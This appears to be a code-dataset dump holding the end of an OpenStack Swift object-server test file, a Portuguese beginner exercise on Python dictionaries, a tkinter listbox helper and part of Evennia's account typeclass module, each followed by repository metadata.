to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# verify success (2xx) to make end of phase2
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
# verify successful object data and durable state file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2#d.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And container update was called
self.assertTrue(context['mock_container_update'].called)
def test_multiphase_put_metadata_footer_disconnect(self):
test_data = 'obj data'
test_doc = "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
))
# eventlet.wsgi won't return < network_chunk_size from a chunked read
self.app.network_chunk_size = 16
with self._check_multiphase_put_commit_handling(
test_doc=test_doc, finish_body=False) as context:
conn = context['conn']
# make footer doc
footer_meta = {
"X-Object-Sysmeta-Ec-Frag-Index": "2",
"Etag": md5(test_data).hexdigest(),
}
footer_json = json.dumps(footer_meta)
footer_meta_cksum = md5(footer_json).hexdigest()
# send most of the footer doc
footer_doc = "\r\n".join((
"X-Document: object metadata",
"Content-MD5: " + footer_meta_cksum,
"",
footer_json,
))
# but don't send final boundary nor last chunk
to_send = "%x\r\n%s\r\n" % \
(len(footer_doc), footer_doc)
conn.send(to_send)
# and then bail out
conn.sock.fd._sock.close()
# and make sure it demonstrates the client disconnect
log_lines = self.logger.get_lines_for_level('info')
self.assertEqual(len(log_lines), 1)
self.assertIn(' 499 ', log_lines[0])
# no artifacts left on disk
found_files = self.find_files()
self.assertFalse(found_files)
# ... and no container update
_container_update = context['mock_container_update']
self.assertFalse(_container_update.called)
def test_multiphase_put_ec_fragment_in_headers_no_footers(self):
test_data = 'obj data'
test_doc = "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
))
# phase1 - PUT request with multiphase commit conversation
# no object metadata in footer
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
# normally the frag index gets sent in the MIME footer (which this
# test doesn't have, see `test_multiphase_put_metadata_footer`),
# but the proxy *could* send the frag index in the headers and
# this test verifies that would work.
'X-Object-Sysmeta-Ec-Frag-Index': '2',
'X-Backend-Storage-Policy-Index': '1',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
with self._check_multiphase_put_commit_handling(
test_doc=test_doc, headers=headers) as context:
expect_headers = context['expect_headers']
self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
# N.B. no X-Obj-Metadata-Footer header
self.assertNotIn('X-Obj-Metadata-Footer', expect_headers)
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# verify success (2xx) to make end of phase2
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
# verify successful object data and durable state file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2#d.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And container update was called
self.assertTrue(context['mock_container_update'].called)
def test_multiphase_put_bad_commit_message(self):
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"junkjunk",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
resp = conn.getresponse()
self.assertEqual(resp.status, 500)
resp.read()
resp.close()
put_timestamp = context['put_timestamp']
_container_update = context['mock_container_update']
# verify that durable data file was NOT created
found_files = self.find_files()
# non durable .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And no container update
self.assertFalse(_container_update.called)
def test_multiphase_put_drains_extra_commit_junk(self):
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123",
"X-Document: we got cleverer",
"",
"stuff stuff meaningless stuuuuuuuuuuff",
"--boundary123",
"X-Document: we got even cleverer; can you believe it?",
"Waneshaft: ambifacient lunar",
"Casing: malleable logarithmic",
"",
"potato potato potato potato potato potato potato",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# verify success (2xx) to make end of phase2
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
# make another request to validate the HTTP protocol state
conn.putrequest('GET', '/sda1/0/a/c/o')
conn.putheader('X-Backend-Storage-Policy-Index', '1')
conn.endheaders()
resp = conn.getresponse()
self.assertEqual(resp.status, 200)
resp.read()
resp.close()
# verify successful object data and durable state file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2#d.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And container update was called
self.assertTrue(context['mock_container_update'].called)
def test_multiphase_put_drains_extra_commit_junk_disconnect(self):
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123",
"X-Document: we got cleverer",
"",
"stuff stuff meaningless stuuuuuuuuuuff",
"--boundary123",
"X-Document: we got even cleverer; can you believe it?",
"Waneshaft: ambifacient lunar",
"Casing: malleable logarithmic",
"",
"potato potato potato potato potato potato potato",
))
# eventlet.wsgi won't return < network_chunk_size from a chunked read
self.app.network_chunk_size = 16
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# send commit confirmation and some other stuff
# but don't send final boundary or last chunk
to_send = "%x\r\n%s\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# and then bail out
conn.sock.fd._sock.close()
# and make sure it demonstrates the client disconnect
log_lines = self.logger.get_lines_for_level('info')
self.assertEqual(len(log_lines), 1)
self.assertIn(' 499 ', log_lines[0])
# verify successful object data and durable state file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2#d.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# but no container update
self.assertFalse(context['mock_container_update'].called)
@patch_policies
class TestZeroCopy(unittest.TestCase):
"""Test the object server's zero-copy functionality"""
def _system_can_zero_copy(self):
if not splice.available:
return False
try:
utils.get_md5_socket()
except IOError:
return False
return True
def setUp(self):
if not self._system_can_zero_copy():
raise SkipTest("zero-copy support is missing")
self.testdir = mkdtemp(suffix="obj_server_zero_copy")
mkdirs(os.path.join(self.testdir, 'sda1', 'tmp'))
conf = {'devices': self.testdir,
'mount_check': 'false',
'splice': 'yes',
'disk_chunk_size': '4096'}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.df_mgr = diskfile.DiskFileManager(
conf, self.object_controller.logger)
listener = listen_zero()
port = listener.getsockname()[1]
self.wsgi_greenlet = spawn(
wsgi.server, listener, self.object_controller, NullLogger())
self.http_conn = httplib.HTTPConnection('127.0.0.1', port)
self.http_conn.connect()
def tearDown(self):
"""Tear down for testing swift.object.server.ObjectController"""
self.wsgi_greenlet.kill()
rmtree(self.testdir)
def test_GET(self):
url_path = '/sda1/2100/a/c/o'
self.http_conn.request('PUT', url_path, 'obj contents',
{'X-Timestamp': '127082564.24709',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, 'obj contents')
def test_GET_big(self):
# Test with a large-ish object to make sure we handle full socket
# buffers correctly.
obj_contents = 'A' * 4 * 1024 * 1024 # 4 MiB
url_path = '/sda1/2100/a/c/o'
self.http_conn.request('PUT', url_path, obj_contents,
{'X-Timestamp': '1402600322.52126',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, obj_contents)
def test_quarantine(self):
obj_hash = hash_path('a', 'c', 'o')
url_path = '/sda1/2100/a/c/o'
ts = '1402601849.47475'
self.http_conn.request('PUT', url_path, 'obj contents',
{'X-Timestamp': ts,
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
# go goof up the file on disk
fname = os.path.join(self.testdir, 'sda1', 'objects', '2100',
obj_hash[-3:], obj_hash, ts + '.data')
with open(fname, 'rb+') as fh:
fh.write('XYZ')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, 'XYZ contents')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
# it was quarantined by the previous request
self.assertEqual(response.status, 404)
response.read()
def test_quarantine_on_well_formed_zero_byte_file(self):
# Make sure we work around an oddity in Linux's hash sockets
url_path = '/sda1/2100/a/c/o'
ts = '1402700497.71333'
self.http_conn.request(
'PUT', url_path, '',
{'X-Timestamp': ts, 'Content-Length': '0',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, '')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200) # still there
contents = response.read()
self.assertEqual(contents, '')
class TestConfigOptionHandling(unittest.TestCase):
def setUp(self):
self.tmpdir = mkdtemp()
def tearDown(self):
rmtree(self.tmpdir)
def _app_config(self, config):
contents = dedent(config)
conf_file = os.path.join(self.tmpdir, 'object-server.conf')
with open(conf_file, 'w') as f:
f.write(contents)
return init_request_processor(conf_file, 'object-server')[:2]
def test_default(self):
config = """
[DEFAULT]
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
"""
app, config = self._app_config(config)
self.assertNotIn('reclaim_age', config)
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 604800)
def test_option_in_app(self):
config = """
[DEFAULT]
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
reclaim_age = 100
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '100')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 100)
def test_option_in_default(self):
config = """
[DEFAULT]
reclaim_age = 200
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '200')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 200)
def test_option_in_both(self):
config = """
[DEFAULT]
reclaim_age = 300
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
reclaim_age = 400
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '300')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 300)
# use paste "set" syntax to override global config value
config = """
[DEFAULT]
reclaim_age = 500
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
set reclaim_age = 600
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '600')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 600)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
ab4b58c9f57d81b86dab68de0f9e7f748fa7cce3 | 7680dbfce22b31835107403514f1489a8afcf3df | /Exercícios_parte_2/exercício__090.py | ee3ab125b849a111a10a421c0ee9807bb6c49dac | [] | no_license | EstephanoBartenski/Aprendendo_Python | c0022d545af00c14e6778f6a80f666de31a7659e | 69b4c2e07511a0bd91ac19df59aa9dafdf28fda3 | refs/heads/master | 2022-11-27T17:14:00.949163 | 2020-08-03T22:11:19 | 2020-08-03T22:11:19 | 284,564,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,083 | py | # dicionários
print('--' * 17)
print(' CADASTRO DE NOTAS')
print('--' * 17)
aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input('Média de {}: '.format(aluno['nome'])))
print()
print(f' - O nome é {aluno["nome"]}.\n'
f' - A média é {aluno["med"]:.2f}.')
if aluno['med'] >= 7:
print(' - Situação: APROVADO!')
aluno['situação'] = 'aprovado'
elif 5 <= aluno['med'] < 7:
print(' - Situação: RECUPERAÇÃO!')
aluno['situação'] = 'recuperação'
else:
print(' - Situação: REPROVADO!')
aluno['situação'] = 'reprovado'
print()
print(aluno)
# outra resolução:
'''aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input(f'Média de {aluno["nome"]} '))
if aluno['med'] >= 7:
aluno['situação'] = 'Aprovado'
elif 5 <= aluno['med'] < 7:
aluno['situação'] = 'Recuperação'
else:
aluno['situação'] = 'Reprovado'
print('--' * 30)
for k, v in aluno.items():
print(f' - {k} é igual a {v}')''' | [
"[email protected]"
] | |
4345f43ceebfae6bf9b4514241a243202d936d70 | 6d71de4e88dcb7d04f6d3a18736d393e12f8d087 | /scripts/packages/mylistbox.py | 27d62cd97b87fe9edbbcf35263ca9292f8eac3c9 | [
"MIT"
] | permissive | wyolum/Alex | 71075c30691229e8eb28afa06a6ab44c450b14d4 | 03f1d8ae0107454d18964e33777ffc4c0c1a1951 | refs/heads/main | 2023-07-02T16:11:57.088323 | 2021-08-05T17:59:04 | 2021-08-05T17:59:04 | 338,686,528 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | #https://tk-tutorial.readthedocs.io/en/latest/listbox/listbox.html
import tkinter as tk
def listbox(parent, items, item_clicked, item_selected, n_row=40):
def myclick(event=None):
idx = lb.curselection()
if idx:
out = lb.get(idx)
search.delete(0, tk.END)
search.insert(0, out)
item_clicked(out)
def myselect(event):
myclick(event)
idx = lb.curselection()
out = lb.get(idx)
item_selected(out)
def search_changed(*args):
search_str = search_var.get()
i = 0
lb.delete(0, tk.END)
for item in items:
if search_str.lower() in item.lower():
lb.insert(i, item)
i += 1
frame = tk.Frame(parent)
search_var = tk.StringVar()
#search_var.trace('w', search_changed)
search = tk.Entry(frame, width=40, textvariable=search_var)
search.grid(row=1, column=0)
var = tk.StringVar(value=items)
lb = tk.Listbox(frame, listvariable=var, selectmode='single', height=n_row, width=40)
lb.grid(row=2, column=0)
lb.bind('<<ListboxSelect>>', myclick)
lb.bind('<Double-Button-1>', myselect)
frame.get = lb.get
frame.insert = lb.insert
frame.delete = lb.delete
frame.index = lb.index
return frame
def click(*args):
print('click', args)
def select(*args):
print('select', args)
if __name__ == '__main__':
root = tk.Tk()
frame = listbox(root, dir(tk), click, select)
frame.grid()
root.mainloop()
| [
"[email protected]"
] | |
7a1b250d70836eea4d41151baba4c99d37dad85c | 5d8cecc379bb828694662c865930be8c75d26943 | /evennia/accounts/accounts.py | 626c4a60f3a83d7b5cfa779d6967e68f0be50d6e | [
"BSD-3-Clause"
] | permissive | job/evennia | 714e0f3699875169ce0987e4ebc6b5340bef8cbd | 5aaa0fcfee6082a3a2259a6562c459c5f21fb591 | refs/heads/master | 2021-05-08T23:56:14.348366 | 2018-01-30T17:22:24 | 2018-01-30T17:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,062 | py | """
Typeclass for Account objects
Note that this object is primarily intended to
store OOC information, not game info! This
object represents the actual user (not their
character) and has NO actual precence in the
game world (this is handled by the associated
character object, so you should customize that
instead for most things).
"""
import time
from django.conf import settings
from django.utils import timezone
from evennia.typeclasses.models import TypeclassBase
from evennia.accounts.manager import AccountManager
from evennia.accounts.models import AccountDB
from evennia.objects.models import ObjectDB
from evennia.comms.models import ChannelDB
from evennia.commands import cmdhandler
from evennia.utils import logger
from evennia.utils.utils import (lazy_property,
make_iter, to_unicode, is_iter,
variable_from_module)
from evennia.typeclasses.attributes import NickHandler
from evennia.scripts.scripthandler import ScriptHandler
from evennia.commands.cmdsethandler import CmdSetHandler
from django.utils.translation import ugettext as _
from future.utils import with_metaclass
__all__ = ("DefaultAccount",)
_SESSIONS = None
_AT_SEARCH_RESULT = variable_from_module(*settings.SEARCH_AT_RESULT.rsplit('.', 1))
_MULTISESSION_MODE = settings.MULTISESSION_MODE
_MAX_NR_CHARACTERS = settings.MAX_NR_CHARACTERS
_CMDSET_ACCOUNT = settings.CMDSET_ACCOUNT
_CONNECT_CHANNEL = None
class AccountSessionHandler(object):
"""
Manages the session(s) attached to an account.
"""
def __init__(self, account):
"""
Initializes the handler.
Args:
account (Account): The Account on which this handler is defined.
"""
self.account = account
def get(self, sessid=None):
"""
Get the sessions linked to this object.
Args:
sessid (int, optional): Specify a given session by
session id.
Returns:
sessions (list): A list of Session objects. If `sessid`
is given, this is a list with one (or zero) elements.
"""
global _SESSIONS
if not _SESSIONS:
from evennia.server.sessionhandler import SESSIONS as _SESSIONS
if sessid:
return make_iter(_SESSIONS.session_from_account(self.account, sessid))
else:
return _SESSIONS.sessions_from_account(self.account)
def all(self):
"""
Alias to get(), returning all sessions.
Returns:
sessions (list): All sessions.
"""
return self.get()
def count(self):
"""
Get amount of sessions connected.
Returns:
sesslen (int): Number of sessions handled.
"""
return len(self.get())
class DefaultAccount(with_metaclass(TypeclassBase, AccountDB)):
"""
This is the base Typeclass for all Accounts. Accounts represent
the person playing the game and tracks account info, password
etc. They are OOC entities without presence in-game. An Account
can connect to a Character Object in order to "enter" the
game.
Account Typeclass API:
* Available properties (only available on initiated typeclass objects)
- key (string) - name of account
- name (string)- wrapper for user.username
- aliases (list of strings) - aliases to the object. Will be saved to
database as AliasDB entries but returned as strings.
- dbref (int, read-only) - unique #id-number. Also "id" can be used.
- date_created (string) - time stamp of object creation
- permissions (list of strings) - list of permission strings
- user (User, read-only) - django User authorization object
- obj (Object) - game object controlled by account. 'character' can also
be used.
- sessions (list of Sessions) - sessions connected to this account
- is_superuser (bool, read-only) - if the connected user is a superuser
* Handlers
- locks - lock-handler: use locks.add() to add new lock strings
- db - attribute-handler: store/retrieve database attributes on this
self.db.myattr=val, val=self.db.myattr
- ndb - non-persistent attribute handler: same as db but does not
create a database entry when storing data
- scripts - script-handler. Add new scripts to object with scripts.add()
- cmdset - cmdset-handler. Use cmdset.add() to add new cmdsets to object
- nicks - nick-handler. New nicks with nicks.add().
* Helper methods
- msg(text=None, from_obj=None, session=None, options=None, **kwargs)
- execute_cmd(raw_string)
- search(ostring, global_search=False, attribute_name=None,
use_nicks=False, location=None,
ignore_errors=False, account=False)
- is_typeclass(typeclass, exact=False)
- swap_typeclass(new_typeclass, clean_attributes=False, no_default=True)
- access(accessing_obj, access_type='read', default=False, no_superuser_bypass=False)
- check_permstring(permstring)
* Hook methods
basetype_setup()
at_account_creation()
> note that the following hooks are also found on Objects and are
usually handled on the character level:
- at_init()
- at_access()
- at_cmdset_get(**kwargs)
- at_first_login()
- at_post_login(session=None)
- at_disconnect()
- at_message_receive()
- at_message_send()
- at_server_reload()
- at_server_shutdown()
"""
objects = AccountManager()
# properties
@lazy_property
def cmdset(self):
return CmdSetHandler(self, True)
@lazy_property
def scripts(self):
return ScriptHandler(self)
@lazy_property
def nicks(self):
return NickHandler(self)
@lazy_property
def sessions(self):
return AccountSessionHandler(self)
# session-related methods
def disconnect_session_from_account(self, session, reason=None):
"""
Access method for disconnecting a given session from the
account (connection happens automatically in the
sessionhandler)
Args:
session (Session): Session to disconnect.
reason (str, optional): Eventual reason for the disconnect.
"""
global _SESSIONS
if not _SESSIONS:
from evennia.server.sessionhandler import SESSIONS as _SESSIONS
_SESSIONS.disconnect(session, reason)
# puppeting operations
def puppet_object(self, session, obj):
"""
Use the given session to control (puppet) the given object (usually
a Character type).
Args:
session (Session): session to use for puppeting
obj (Object): the object to start puppeting
Raises:
RuntimeError: If puppeting is not possible, the
`exception.msg` will contain the reason.
"""
# safety checks
if not obj:
raise RuntimeError("Object not found")
if not session:
raise RuntimeError("Session not found")
if self.get_puppet(session) == obj:
# already puppeting this object
self.msg("You are already puppeting this object.")
return
if not obj.access(self, 'puppet'):
# no access
self.msg("You don't have permission to puppet '%s'." % obj.key)
return
if obj.account:
# object already puppeted
if obj.account == self:
if obj.sessions.count():
# we may take over another of our sessions
# output messages to the affected sessions
if _MULTISESSION_MODE in (1, 3):
txt1 = "Sharing |c%s|n with another of your sessions."
txt2 = "|c%s|n|G is now shared from another of your sessions.|n"
self.msg(txt1 % obj.name, session=session)
self.msg(txt2 % obj.name, session=obj.sessions.all())
else:
txt1 = "Taking over |c%s|n from another of your sessions."
txt2 = "|c%s|n|R is now acted from another of your sessions.|n"
self.msg(txt1 % obj.name, session=session)
self.msg(txt2 % obj.name, session=obj.sessions.all())
self.unpuppet_object(obj.sessions.get())
elif obj.account.is_connected:
# controlled by another account
self.msg("|c%s|R is already puppeted by another Account." % obj.key)
return
# do the puppeting
if session.puppet:
# cleanly unpuppet eventual previous object puppeted by this session
self.unpuppet_object(session)
# if we get to this point the character is ready to puppet or it
# was left with a lingering account/session reference from an unclean
# server kill or similar
obj.at_pre_puppet(self, session=session)
# do the connection
obj.sessions.add(session)
obj.account = self
session.puid = obj.id
session.puppet = obj
# validate/start persistent scripts on object
obj.scripts.validate()
# re-cache locks to make sure superuser bypass is updated
obj.locks.cache_lock_bypass(obj)
# final hook
obj.at_post_puppet()
def unpuppet_object(self, session):
"""
Disengage control over an object.
Args:
session (Session or list): The session or a list of
sessions to disengage from their puppets.
Raises:
RuntimeError With message about error.
"""
for session in make_iter(session):
obj = session.puppet
if obj:
# do the disconnect, but only if we are the last session to puppet
obj.at_pre_unpuppet()
obj.sessions.remove(session)
if not obj.sessions.count():
del obj.account
obj.at_post_unpuppet(self, session=session)
# Just to be sure we're always clear.
session.puppet = None
session.puid = None
def unpuppet_all(self):
"""
Disconnect all puppets. This is called by server before a
reset/shutdown.
"""
self.unpuppet_object(self.sessions.all())
def get_puppet(self, session):
"""
Get an object puppeted by this session through this account. This is
the main method for retrieving the puppeted object from the
account's end.
Args:
session (Session): Find puppeted object based on this session
Returns:
puppet (Object): The matching puppeted object, if any.
"""
return session.puppet
def get_all_puppets(self):
"""
Get all currently puppeted objects.
Returns:
puppets (list): All puppeted objects currently controlled
by this Account.
"""
return list(set(session.puppet for session in self.sessions.all() if session.puppet))
def __get_single_puppet(self):
"""
This is a legacy convenience link for use with `MULTISESSION_MODE`.
Returns:
puppets (Object or list): Users of `MULTISESSION_MODE` 0 or 1 will
always get the first puppet back. Users of higher `MULTISESSION_MODE`s will
get a list of all puppeted objects.
"""
puppets = self.get_all_puppets()
if _MULTISESSION_MODE in (0, 1):
return puppets and puppets[0] or None
return puppets
character = property(__get_single_puppet)
puppet = property(__get_single_puppet)
# utility methods
def delete(self, *args, **kwargs):
"""
Deletes the account permanently.
Notes:
`*args` and `**kwargs` are passed on to the base delete
mechanism (these are usually not used).
"""
for session in self.sessions.all():
# unpuppeting all objects and disconnecting the user, if any
# sessions remain (should usually be handled from the
# deleting command)
try:
self.unpuppet_object(session)
except RuntimeError:
# no puppet to disconnect from
pass
session.sessionhandler.disconnect(session, reason=_("Account being deleted."))
self.scripts.stop()
self.attributes.clear()
self.nicks.clear()
self.aliases.clear()
super(DefaultAccount, self).delete(*args, **kwargs)
# methods inherited from database model
def msg(self, text=None, from_obj=None, session=None, options=None, **kwargs):
"""
Evennia -> User
This is the main route for sending data back to the user from the
server.
Args:
text (str, optional): text data to send
from_obj (Object or Account or list, optional): Object sending. If given, its
at_msg_send() hook will be called. If iterable, call on all entities.
session (Session or list, optional): Session object or a list of
Sessions to receive this send. If given, overrules the
default send behavior for the current
MULTISESSION_MODE.
options (list): Protocol-specific options. Passed on to the protocol.
Kwargs:
any (dict): All other keywords are passed on to the protocol.
"""
if from_obj:
# call hook
for obj in make_iter(from_obj):
try:
obj.at_msg_send(text=text, to_obj=self, **kwargs)
except Exception:
# this may not be assigned.
logger.log_trace()
try:
if not self.at_msg_receive(text=text, **kwargs):
# abort message to this account
return
except Exception:
# this may not be assigned.
pass
kwargs["options"] = options
# session relay
sessions = make_iter(session) if session else self.sessions.all()
for session in sessions:
session.data_out(text=text, **kwargs)
def execute_cmd(self, raw_string, session=None, **kwargs):
"""
Do something as this account. This method is never called normally,
but only when the account object itself is supposed to execute the
command. It takes account nicks into account, but not nicks of
eventual puppets.
Args:
raw_string (str): Raw command input coming from the command line.
session (Session, optional): The session to be responsible
for the command-send
Kwargs:
kwargs (any): Other keyword arguments will be added to the
found command object instance as variables before it
executes. This is unused by default Evennia but may be
used to set flags and change operating paramaters for
commands at run-time.
"""
raw_string = to_unicode(raw_string)
raw_string = self.nicks.nickreplace(raw_string, categories=("inputline", "channel"), include_account=False)
if not session and _MULTISESSION_MODE in (0, 1):
# for these modes we use the first/only session
sessions = self.sessions.get()
session = sessions[0] if sessions else None
return cmdhandler.cmdhandler(self, raw_string,
callertype="account", session=session, **kwargs)
def search(self, searchdata, return_puppet=False, search_object=False,
typeclass=None, nofound_string=None, multimatch_string=None, use_nicks=True, **kwargs):
"""
This is similar to `DefaultObject.search` but defaults to searching
for Accounts only.
Args:
searchdata (str or int): Search criterion, the Account's
key or dbref to search for.
return_puppet (bool, optional): Instructs the method to
return matches as the object the Account controls rather
than the Account itself (or None) if nothing is puppeted).
search_object (bool, optional): Search for Objects instead of
Accounts. This is used by e.g. the @examine command when
wanting to examine Objects while OOC.
typeclass (Account typeclass, optional): Limit the search
only to this particular typeclass. This can be used to
limit to specific account typeclasses or to limit the search
to a particular Object typeclass if `search_object` is True.
nofound_string (str, optional): A one-time error message
to echo if `searchdata` leads to no matches. If not given,
will fall back to the default handler.
multimatch_string (str, optional): A one-time error
message to echo if `searchdata` leads to multiple matches.
If not given, will fall back to the default handler.
use_nicks (bool, optional): Use account-level nick replacement.
Return:
match (Account, Object or None): A single Account or Object match.
Notes:
Extra keywords are ignored, but are allowed in call in
order to make API more consistent with
objects.objects.DefaultObject.search.
"""
# handle me, self and *me, *self
if isinstance(searchdata, basestring):
# handle wrapping of common terms
if searchdata.lower() in ("me", "*me", "self", "*self",):
return self
if search_object:
matches = ObjectDB.objects.object_search(searchdata, typeclass=typeclass, use_nicks=use_nicks)
else:
searchdata = self.nicks.nickreplace(searchdata, categories=("account", ), include_account=False)
matches = AccountDB.objects.account_search(searchdata, typeclass=typeclass)
matches = _AT_SEARCH_RESULT(matches, self, query=searchdata,
nofound_string=nofound_string,
multimatch_string=multimatch_string)
if matches and return_puppet:
try:
return matches.puppet
except AttributeError:
return None
return matches
def access(self, accessing_obj, access_type='read', default=False, no_superuser_bypass=False, **kwargs):
"""
Determines if another object has permission to access this
object in whatever way.
Args:
accessing_obj (Object): Object trying to access this one.
access_type (str, optional): Type of access sought.
default (bool, optional): What to return if no lock of
access_type was found
no_superuser_bypass (bool, optional): Turn off superuser
lock bypassing. Be careful with this one.
Kwargs:
kwargs (any): Passed to the at_access hook along with the result.
Returns:
result (bool): Result of access check.
"""
result = super(DefaultAccount, self).access(accessing_obj, access_type=access_type,
default=default, no_superuser_bypass=no_superuser_bypass)
self.at_access(result, accessing_obj, access_type, **kwargs)
return result
@property
def idle_time(self):
"""
Returns the idle time of the least idle session in seconds. If
no sessions are connected it returns nothing.
"""
idle = [session.cmd_last_visible for session in self.sessions.all()]
if idle:
return time.time() - float(max(idle))
return None
@property
def connection_time(self):
"""
Returns the maximum connection time of all connected sessions
in seconds. Returns nothing if there are no sessions.
"""
conn = [session.conn_time for session in self.sessions.all()]
if conn:
return time.time() - float(min(conn))
return None
# account hooks
def basetype_setup(self):
"""
This sets up the basic properties for an account. Overload this
with at_account_creation rather than changing this method.
"""
# A basic security setup
lockstring = "examine:perm(Admin);edit:perm(Admin);" \
"delete:perm(Admin);boot:perm(Admin);msg:all();" \
"noidletimeout:perm(Builder) or perm(noidletimeout)"
self.locks.add(lockstring)
# The ooc account cmdset
self.cmdset.add_default(_CMDSET_ACCOUNT, permanent=True)
def at_account_creation(self):
"""
This is called once, the very first time the account is created
(i.e. first time they register with the game). It's a good
place to store attributes all accounts should have, like
configuration values etc.
"""
# set an (empty) attribute holding the characters this account has
lockstring = "attrread:perm(Admins);attredit:perm(Admins);" \
"attrcreate:perm(Admins);"
self.attributes.add("_playable_characters", [], lockstring=lockstring)
self.attributes.add("_saved_protocol_flags", {}, lockstring=lockstring)
def at_init(self):
"""
This is always called whenever this object is initiated --
that is, whenever it its typeclass is cached from memory. This
